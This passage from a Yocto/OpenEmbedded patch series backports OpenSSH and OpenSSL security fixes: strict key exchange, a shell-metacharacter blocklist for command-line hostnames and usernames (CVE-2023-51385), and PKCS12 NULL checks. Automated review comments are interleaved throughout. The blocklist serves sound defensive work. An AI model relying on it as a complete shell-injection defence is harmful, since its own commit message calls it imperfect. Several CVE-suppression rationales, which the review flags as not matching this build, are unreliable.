+- state->keep_alive_timeouts = 0;
+- DBG(debug("received packet type %d", *typep));
++ if (*typep == 0) {
++ /* no message ready */
++ return 0;
++ }
++ state->keep_alive_timeouts = 0;
++ DBG(debug("received packet type %d", *typep));
++
++ /* Always process disconnect messages */
++ if (*typep == SSH2_MSG_DISCONNECT) {
++ if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
++ (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
++ return r;
++ /* Ignore normal client exit notifications */
++ do_log2(ssh->state->server_side &&
++ reason == SSH2_DISCONNECT_BY_APPLICATION ?
++ SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
++ "Received disconnect from %s port %d:"
++ "%u: %.400s", ssh_remote_ipaddr(ssh),
++ ssh_remote_port(ssh), reason, msg);
++ free(msg);
++ return SSH_ERR_DISCONNECTED;
+ }
++
++ /*
++ * Do not implicitly handle any messages here during initial
++ * KEX when in strict mode. They will be need to be allowed
++ * explicitly by the KEX dispatch table or they will generate
++ * protocol errors.
++ */
++ if (ssh->kex != NULL &&
++ (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
++ return 0;
++ /* Implicitly handle transport-level messages */
+ switch (*typep) {
+ case SSH2_MSG_IGNORE:
+ debug3("Received SSH2_MSG_IGNORE");
+@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ debug("Remote: %.900s", msg);
+ free(msg);
+ break;
+- case SSH2_MSG_DISCONNECT:
+- if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
+- (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
+- return r;
+- /* Ignore normal client exit notifications */
+- do_log2(ssh->state->server_side &&
+- reason == SSH2_DISCONNECT_BY_APPLICATION ?
+- SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
+- "Received disconnect from %s port %d:"
+- "%u: %.400s", ssh_remote_ipaddr(ssh),
+- ssh_remote_port(ssh), reason, msg);
+- free(msg);
+- return SSH_ERR_DISCONNECTED;
+ case SSH2_MSG_UNIMPLEMENTED:
+ if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
+ return r;
+@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
+ (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
++ (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
+@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
++ (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
+@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
+ vsnprintf(buf, sizeof(buf), fmt, args);
+ va_end(args);
+
++ debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
+ (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
+ (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 5df9477..617ed9f 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
+ fatal("%s: kex_assemble_namelist", __func__);
+ free(all_key);
+
+- if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
++ if ((s = kex_names_cat(options.kex_algorithms,
++ "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
+ fatal("%s: kex_names_cat", __func__);
+ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] =
+@@ -343,7 +344,6 @@ struct cauthmethod {
+ };
+
+ static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
+-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
+ static int input_userauth_success(int, u_int32_t, struct ssh *);
+ static int input_userauth_failure(int, u_int32_t, struct ssh *);
+ static int input_userauth_banner(int, u_int32_t, struct ssh *);
+@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
+
+ ssh->authctxt = &authctxt;
+ ssh_dispatch_init(ssh, &input_userauth_error);
+- ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
+ ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
+ ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success); /* loop until success */
+ pubkey_cleanup(ssh);
+@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
+ return r;
+ }
+
+-/* ARGSUSED */
+-static int
+-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
+-{
+- return kex_input_ext_info(type, seqnr, ssh);
+-}
+-
+ void
+ userauth(struct ssh *ssh, char *authlist)
+ {
+@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
+ free(authctxt->methoddata);
+ authctxt->methoddata = NULL;
+ authctxt->success = 1; /* break out */
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
+ return 0;
+ }
+
+diff --git a/sshd.c b/sshd.c
+index 60b2aaf..ffea38c 100644
+--- a/sshd.c
++++ b/sshd.c
+@@ -2323,11 +2323,13 @@ static void
+ do_ssh2_kex(struct ssh *ssh)
+ {
+ char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
++ char *s;
+ struct kex *kex;
+ int r;
+
+- myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
+- options.kex_algorithms);
++ if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
++ fatal("kex_names_cat");
++ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
+ options.ciphers);
+ myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
+@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
+ packet_send();
+ packet_write_wait();
+ #endif
++ free(s);
+ debug("KEX done");
+ }
+
+--
+2.25.1
+
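Review bot: In the kex.c hunk for kex_protocol_error the log call becomes `error("type %u seq %u", type, seq);`, which drops the old "kex protocol error:" prefix and has no function-name prefix either (the header says the `error*_f()` calls were replaced with `error*()`), so the resulting log line no longer says what failed. Keeping it identifiable is a one-line change: `error("%s: type %u seq %u", __func__, type, seq);`. Note also that `type` is an `int` printed with `%u`. In the packet.c hunk for kex_from_blob, `sshbuf_get_u32(m, &kex->kex_strict)` passes the address of the new `int kex_strict` field without the `(u_int *)` cast used on the neighbouring `hostkey_type` and `hostkey_nid` lines; `(r = sshbuf_get_u32(m, (u_int *)&kex->kex_strict)) != 0 ||` would match them. The enclosing functions extend beyond the hunks.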
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
new file mode 100644
index 0000000000..0ba8c312d0
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
+From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:47:44 +0000
+Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
+
+This makes ssh(1) refuse user or host names provided on the
+commandline that contain most shell metacharacters.
+
+Some programs that invoke ssh(1) using untrusted data do not filter
+metacharacters in arguments they supply. This could create
+interactions with user-specified ProxyCommand and other directives
+that allow shell injection attacks to occur.
+
+It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
+but getting this stuff right can be tricky, so this should prevent
+most obvious ways of creating risky situations. It however is not
+and cannot be perfect: ssh(1) has no practical way of interpreting
+what shell quoting rules are in use and how they interact with the
+user's specified ProxyCommand.
+
+To allow configurations that use strange user or hostnames to
+continue to work, this strictness is applied only to names coming
+from the commandline. Names specified using User or Hostname
+directives in ssh_config(5) are not affected.
+
+feedback/ok millert@ markus@ dtucker@ deraadt@
+
+OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
+
+CVE: CVE-2023-51385
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunks refreshed to apply cleanly
+
+---
+ ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 40 insertions(+), 1 deletion(-)
+
+diff --git a/ssh.c b/ssh.c
+index 35c48e62d18..48d93ddf2a9 100644
+--- a/ssh.c
++++ b/ssh.c
+@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
+ }
+ }
+
++static int
++valid_hostname(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
++ isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
++ return 0;
++ }
++ return 1;
++}
++
++static int
++valid_ruser(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\";&<>|(){}", s[i]) != NULL)
++ return 0;
++ /* Disallow '-' after whitespace */
++ if (isspace((u_char)s[i]) && s[i + 1] == '-')
++ return 0;
++ /* Disallow \ in last position */
++ if (s[i] == '\\' && s[i + 1] == '\0')
++ return 0;
++ }
++ return 1;
++}
++
+ /*
+ * Main program for the ssh client.
+ */
+@@ -1069,6 +1104,10 @@ main(int ac, char **av)
+ if (!host)
+ usage();
+
++ if (!valid_hostname(host))
++ fatal("hostname contains invalid characters");
++ if (options.user != NULL && !valid_ruser(options.user))
++ fatal("remote username contains invalid characters");
+ host_arg = xstrdup(host);
+
+ /* Initialize the command to execute on remote host. */
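Review bot: valid_hostname() and valid_ruser() are added without any comment, although they apply different rules: the user check permits `$`, a non-trailing backslash and most whitespace, while the host check rejects all of these. Per the commit message they are also meant only for names taken from the command line. A short header on each would keep that contract visible, for example `/* Reject command-line hostnames that start with '-' or contain shell metacharacters, whitespace or control characters. */` and `/* Remote user filter: bans fewer characters than valid_hostname(); not a complete defence against shell quoting issues. */`. It is also worth a comment at the call site in main() that names set through User/Hostname in ssh_config are deliberately not checked. main() continues outside the hunk.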
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd.socket b/meta/recipes-connectivity/openssh/openssh/sshd.socket
index 12c39b26b5..8d76d62309 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd.socket
+++ b/meta/recipes-connectivity/openssh/openssh/sshd.socket
@@ -1,5 +1,6 @@
[Unit]
Conflicts=sshd.service
+Wants=sshdgenkeys.service
[Socket]
ExecStartPre=@BASE_BINDIR@/mkdir -p /var/run/sshd
diff --git a/meta/recipes-connectivity/openssh/openssh/sshd@.service b/meta/recipes-connectivity/openssh/openssh/sshd@.service
index 9d83dfb2bb..422450c7a1 100644
--- a/meta/recipes-connectivity/openssh/openssh/sshd@.service
+++ b/meta/recipes-connectivity/openssh/openssh/sshd@.service
@@ -1,13 +1,11 @@
[Unit]
Description=OpenSSH Per-Connection Daemon
-Wants=sshdgenkeys.service
After=sshdgenkeys.service
[Service]
Environment="SSHD_OPTS="
EnvironmentFile=-/etc/default/ssh
ExecStart=-@SBINDIR@/sshd -i $SSHD_OPTS
-ExecReload=@BASE_BINDIR@/kill -HUP $MAINPID
StandardInput=socket
StandardError=syslog
KillMode=process
diff --git a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
index fe94f30503..9d6cf7da6c 100644
--- a/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
+++ b/meta/recipes-connectivity/openssh/openssh_8.2p1.bb
@@ -5,7 +5,7 @@ Ssh (Secure Shell) is a program for logging into a remote machine \
and for executing commands on a remote machine."
HOMEPAGE = "http://www.openssh.com/"
SECTION = "console/network"
-LICENSE = "BSD & ISC & MIT"
+LICENSE = "BSD-2-Clause & BSD-3-Clause & BSD-4-Clause & ISC & MIT"
LIC_FILES_CHKSUM = "file://LICENCE;md5=18d9e5a8b3dd1790d73502f50426d4d3"
DEPENDS = "zlib openssl virtual/crypt"
@@ -24,14 +24,63 @@ SRC_URI = "http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-${PV}.tar
file://fix-potential-signed-overflow-in-pointer-arithmatic.patch \
file://sshd_check_keys \
file://add-test-support-for-busybox.patch \
+ file://CVE-2020-14145.patch \
+ file://CVE-2021-28041.patch \
+ file://CVE-2021-41617.patch \
+ file://CVE-2023-38408-01.patch \
+ file://CVE-2023-38408-02.patch \
+ file://CVE-2023-38408-03.patch \
+ file://CVE-2023-38408-04.patch \
+ file://CVE-2023-38408-05.patch \
+ file://CVE-2023-38408-06.patch \
+ file://CVE-2023-38408-07.patch \
+ file://CVE-2023-38408-08.patch \
+ file://CVE-2023-38408-09.patch \
+ file://CVE-2023-38408-10.patch \
+ file://CVE-2023-38408-11.patch \
+ file://CVE-2023-38408-12.patch \
+ file://CVE-2023-48795.patch \
+ file://CVE-2023-51385.patch \
"
SRC_URI[md5sum] = "3076e6413e8dbe56d33848c1054ac091"
SRC_URI[sha256sum] = "43925151e6cf6cee1450190c0e9af4dc36b41c12737619edff8bcebdff64e671"
+# This CVE is specific to OpenSSH with the pam opie which we don't build/use here
+CVE_CHECK_WHITELIST += "CVE-2007-2768"
+
# This CVE is specific to OpenSSH server, as used in Fedora and Red Hat Enterprise Linux 7
# and when running in a Kerberos environment. As such it is not relevant to OpenEmbedded
CVE_CHECK_WHITELIST += "CVE-2014-9278"
+# As per upstream, because of the way scp is based on a historical protocol called rcp
+# which relies on that style of argument passing and therefore encounters expansion
+# problems. Making changes to how the scp command line works breaks the pattern used
+# by scp consumers. Upstream therefore recommends the use of rsync in the place of
+# scp for better security. https://bugzilla.redhat.com/show_bug.cgi?id=1860487
+CVE_CHECK_WHITELIST += "CVE-2020-15778"
+
+# CVE-2008-3844 was reported in OpenSSH on Red Hat Enterprise Linux and
+# certain packages may have been compromised. This CVE is not applicable
+# as our source is OpenBSD. https://securitytracker.com/id?1020730
+# https://www.securityfocus.com/bid/30794
+CVE_CHECK_WHITELIST += "CVE-2008-3844"
+
+# openssh-ssh1 is provided for compatibility with old devices that
+# cannot be upgraded to modern protocols. Thus they may not provide security
+# support for this package because doing so would prevent access to equipment.
+# The upstream OpenSSH developers see this as an important
+# security feature and do not intend to 'fix' it.
+# https://security-tracker.debian.org/tracker/CVE-2016-20012
+# https://ubuntu.com/security/CVE-2016-20012
+CVE_CHECK_WHITELIST += "CVE-2016-20012"
+
+# As per debian, the issue is fixed by a feature called "agent restriction" in openssh 8.9
+# Urgency is unimportant as per debian, Hence this CVE is whitelisting.
+# https://security-tracker.debian.org/tracker/CVE-2021-36368
+# https://bugzilla.mindrot.org/show_bug.cgi?id=3316#c2
+# https://docs.ssh-mitm.at/trivialauth.html
+CVE_CHECK_WHITELIST += "CVE-2021-36368"
+
PAM_SRC_URI = "file://sshd"
inherit manpages useradd update-rc.d update-alternatives systemd
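Review bot: The justification added for `CVE_CHECK_WHITELIST += "CVE-2016-20012"` talks about an `openssh-ssh1` package kept for old devices, which does not describe this recipe. The CVE-2021-36368 entry says the issue is addressed by a feature in openssh 8.9 while the recipe builds 8.2p1, so both entries silence the CVE checker with a rationale a later reader cannot verify against this package. Reword each comment to state why this build is unaffected or why the risk is accepted, e.g. `# Upstream considers this behaviour intentional and does not plan to change it; not patched here.` for CVE-2016-20012 and `# Not fixed in 8.2p1 (addressed upstream in 8.9); accepted as low severity per the trackers below.` for CVE-2021-36368.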
@@ -155,12 +204,17 @@ FILES_${PN}-sftp-server = "${libexecdir}/sftp-server"
FILES_${PN}-misc = "${bindir}/ssh* ${libexecdir}/ssh*"
FILES_${PN}-keygen = "${bindir}/ssh-keygen"
-RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen"
+RDEPENDS_${PN} += "${PN}-scp ${PN}-ssh ${PN}-sshd ${PN}-keygen ${PN}-sftp-server"
RDEPENDS_${PN}-sshd += "${PN}-keygen ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-keyinit pam-plugin-loginuid', '', d)}"
RRECOMMENDS_${PN}-sshd_append_class-target = "\
${@bb.utils.filter('PACKAGECONFIG', 'rng-tools', d)} \
"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
# gdb would make attach-ptrace test pass rather than skip but not worth the build dependencies
RDEPENDS_${PN}-ptest += "${PN}-sftp ${PN}-misc ${PN}-sftp-server make sed sudo coreutils"
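Review bot: The added `RDEPENDS:${PN}-dev = ""` uses the colon override separator, while every other assignment in this hunk uses the underscore form (`RDEPENDS_${PN}`, `RDEPENDS_${PN}-sshd`, `FILES_${PN}-keygen`). If the BitBake on this branch treats only `_` as the override separator, the line probably sets an unrelated variable, and the -dev package keeps its dependency on the base package. The SDK conflict with dropbear described in the comment would then remain. `RDEPENDS_${PN}-dev = ""` would match the rest of the recipe; checking the generated -dev package's runtime dependencies would confirm which form takes effect.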
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
new file mode 100644
index 0000000000..e2a65d0998
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch
@@ -0,0 +1,38 @@
+From 679ae2f72ef8cf37609cb0eff5de3b98aa85e395 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Thu, 20 Jul 2023 04:14:42 -1000
+Subject: [PATCH] Configure: add 2 missing key sorts in generation of unified_info
+
+Otherwise generation of this section in configdata.pm is not reproducible
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Backport [adapted from 3.x commit https://github.com/openssl/openssl/commit/764cf5b26306a8712e8b3d41599c44dc5ed07a25]
+---
+ Configure | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Configure b/Configure
+index 2a01746..8fc5a2c 100755
+--- a/Configure
++++ b/Configure
+@@ -2326,7 +2326,7 @@ EOF
+ "dso" => [ @{$unified_info{engines}} ],
+ "bin" => [ @{$unified_info{programs}} ],
+ "script" => [ @{$unified_info{scripts}} ] );
+- foreach my $type (keys %loopinfo) {
++ foreach my $type (sort keys %loopinfo) {
+ foreach my $product (@{$loopinfo{$type}}) {
+ my %dirs = ();
+ my $pd = dirname($product);
+@@ -2347,7 +2347,7 @@ EOF
+ push @{$unified_info{dirinfo}->{$d}->{deps}}, $_
+ if $d ne $pd;
+ }
+- foreach (keys %dirs) {
++ foreach (sort keys %dirs) {
+ push @{$unified_info{dirinfo}->{$_}->{products}->{$type}},
+ $product;
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
new file mode 100644
index 0000000000..b3f6a942d5
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch
@@ -0,0 +1,37 @@
+From 326909baf81a638d51fa8be1d8227518784f5cc4 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Tue, 14 Sep 2021 12:18:25 +0200
+Subject: [PATCH] Configure: do not tweak mips cflags
+
+This conflicts with mips machine definitons from yocto,
+e.g.
+| Error: -mips3 conflicts with the other architecture options, which imply -mips64r2
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ Configure | 10 ----------
+ 1 file changed, 10 deletions(-)
+
+Index: openssl-3.0.4/Configure
+===================================================================
+--- openssl-3.0.4.orig/Configure
++++ openssl-3.0.4/Configure
+@@ -1243,16 +1243,6 @@ if ($target =~ /^mingw/ && `$config{CC} --target-help 2>&1` =~ m/-mno-cygwin/m)
+ push @{$config{shared_ldflag}}, "-mno-cygwin";
+ }
+
+-if ($target =~ /linux.*-mips/ && !$disabled{asm}
+- && !grep { $_ =~ /-m(ips|arch=)/ } (@{$config{CFLAGS}})) {
+- # minimally required architecture flags for assembly modules
+- my $value;
+- $value = '-mips2' if ($target =~ /mips32/);
+- $value = '-mips3' if ($target =~ /mips64/);
+- unshift @{$config{cflags}}, $value;
+- unshift @{$config{cxxflags}}, $value if $config{CXX};
+-}
+-
+ # If threads aren't disabled, check how possible they are
+ unless ($disabled{threads}) {
+ if ($auto_threads) {
diff --git a/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
new file mode 100644
index 0000000000..3da6879ccb
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch
@@ -0,0 +1,122 @@
+Backport of:
+
+From 09df4395b5071217b76dc7d3d2e630eb8c5a79c2 Mon Sep 17 00:00:00 2001
+From: Matt Caswell <matt@openssl.org>
+Date: Fri, 19 Jan 2024 11:28:58 +0000
+Subject: [PATCH] Add NULL checks where ContentInfo data can be NULL
+
+PKCS12 structures contain PKCS7 ContentInfo fields. These fields are
+optional and can be NULL even if the "type" is a valid value. OpenSSL
+was not properly accounting for this and a NULL dereference can occur
+causing a crash.
+
+CVE-2024-0727
+
+Reviewed-by: Tomas Mraz <tomas@openssl.org>
+Reviewed-by: Hugo Landau <hlandau@openssl.org>
+Reviewed-by: Neil Horman <nhorman@openssl.org>
+(Merged from https://github.com/openssl/openssl/pull/23362)
+
+(cherry picked from commit d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c)
+
+Upstream-Status: Backport [https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c]
+
+CVE: CVE-2024-0727
+
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ crypto/pkcs12/p12_add.c | 18 ++++++++++++++++++
+ crypto/pkcs12/p12_mutl.c | 5 +++++
+ crypto/pkcs12/p12_npas.c | 5 +++--
+ crypto/pkcs7/pk7_mime.c | 7 +++++--
+ 4 files changed, 31 insertions(+), 4 deletions(-)
+
+--- a/crypto/pkcs12/p12_add.c
++++ b/crypto/pkcs12/p12_add.c
+@@ -76,6 +76,13 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p7->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+ }
+
+@@ -132,6 +139,12 @@ STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_
+ {
+ if (!PKCS7_type_is_encrypted(p7))
+ return NULL;
++
++ if (p7->d.encrypted == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA, PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+ ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+ pass, passlen,
+@@ -159,6 +172,13 @@ STACK_OF(PKCS7) *PKCS12_unpack_authsafes
+ PKCS12_R_CONTENT_TYPE_NOT_DATA);
+ return NULL;
+ }
++
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
++ PKCS12_R_DECODE_ERROR);
++ return NULL;
++ }
++
+ return ASN1_item_unpack(p12->authsafes->d.data,
+ ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+ }
+--- a/crypto/pkcs12/p12_mutl.c
++++ b/crypto/pkcs12/p12_mutl.c
+@@ -93,6 +93,11 @@ static int pkcs12_gen_mac(PKCS12 *p12, c
+ return 0;
+ }
+
++ if (p12->authsafes->d.data == NULL) {
++ PKCS12err(PKCS12_F_PKCS12_GEN_MAC, PKCS12_R_DECODE_ERROR);
++ return 0;
++ }
++
+ salt = p12->mac->salt->data;
+ saltlen = p12->mac->salt->length;
+ if (!p12->mac->iter)
+--- a/crypto/pkcs12/p12_npas.c
++++ b/crypto/pkcs12/p12_npas.c
+@@ -78,8 +78,9 @@ static int newpass_p12(PKCS12 *p12, cons
+ bags = PKCS12_unpack_p7data(p7);
+ } else if (bagnid == NID_pkcs7_encrypted) {
+ bags = PKCS12_unpack_p7encdata(p7, oldpass, -1);
+- if (!alg_get(p7->d.encrypted->enc_data->algorithm,
+- &pbe_nid, &pbe_iter, &pbe_saltlen))
++ if (p7->d.encrypted == NULL
++ || !alg_get(p7->d.encrypted->enc_data->algorithm,
++ &pbe_nid, &pbe_iter, &pbe_saltlen))
+ goto err;
+ } else {
+ continue;
+--- a/crypto/pkcs7/pk7_mime.c
++++ b/crypto/pkcs7/pk7_mime.c
+@@ -30,10 +30,13 @@ int SMIME_write_PKCS7(BIO *bio, PKCS7 *p
+ {
+ STACK_OF(X509_ALGOR) *mdalgs;
+ int ctype_nid = OBJ_obj2nid(p7->type);
+- if (ctype_nid == NID_pkcs7_signed)
++ if (ctype_nid == NID_pkcs7_signed) {
++ if (p7->d.sign == NULL)
++ return 0;
+ mdalgs = p7->d.sign->md_algs;
+- else
++ } else {
+ mdalgs = NULL;
++ }
+
+ flags ^= SMIME_OLDMIME;
+
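Review bot: The check added in the second p12_add.c hunk (`p7->d.encrypted == NULL`, in the function that goes on to call `PKCS12_item_decrypt_d2i`) raises its error with `PKCS12_F_PKCS12_UNPACK_P7DATA`, the same function code as the plain-data check in the first hunk. The error queue will therefore attribute the failure to the unencrypted unpack path; if this OpenSSL branch defines a function code for the encrypted variant, it should be used instead. The pk7_mime.c check returns 0 for `p7->d.sign == NULL` without queuing any error, so a caller sees a failure with no reason attached. The diffstat lists 18 insertions for p12_add.c while its three hunks add 20 lines, which suggests the header was carried over from the upstream commit rather than regenerated for this backport.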
diff --git a/meta/recipes-connectivity/openssl/openssl/reproducibility.patch b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
new file mode 100644
index 0000000000..8accbc9df2
--- /dev/null
+++ b/meta/recipes-connectivity/openssl/openssl/reproducibility.patch
@@ -0,0 +1,22 @@
+Using localtime() means the output can depend on the timezone of the build machine.
+Using gmtime() is safer. For complete reproducibility use SOURCE_DATE_EPOCH if set.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Upstream-Status: Pending [should be suitable]
+
+Index: openssl-3.0.1/apps/progs.pl
+===================================================================
+--- openssl-3.0.1.orig/apps/progs.pl
++++ openssl-3.0.1/apps/progs.pl
+@@ -21,7 +21,10 @@ die "Unrecognised option, must be -C or
+ my %commands = ();
+ my $cmdre = qr/^\s*int\s+([a-z_][a-z0-9_]*)_main\(\s*int\s+argc\s*,/;
+ my $apps_openssl = shift @ARGV;
+-my $YEAR = [localtime()]->[5] + 1900;
++my $YEAR = [gmtime()]->[5] + 1900;
++if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} !~ /\D/) {
++ $YEAR = [gmtime($ENV{SOURCE_DATE_EPOCH})]->[5] + 1900;
++}
+
+ # because the program apps/openssl has object files as sources, and
+ # they then have the corresponding C files as source, we need to chain
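Review bot: The guard `$ENV{SOURCE_DATE_EPOCH} !~ /\D/` also accepts an empty string, because an empty value contains no non-digit character. `gmtime('')` is then evaluated as epoch 0 and `$YEAR` becomes 1970 instead of falling back to the current year. Matching positively avoids this: `if (defined($ENV{SOURCE_DATE_EPOCH}) && $ENV{SOURCE_DATE_EPOCH} =~ /\A\d+\z/) {`. The script continues outside the hunk.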
diff --git a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
index 815955837b..0e490eabc3 100644
--- a/meta/recipes-connectivity/openssl/openssl_1.1.1g.bb
+++ b/meta/recipes-connectivity/openssl/openssl_1.1.1w.bb
@@ -17,13 +17,17 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \
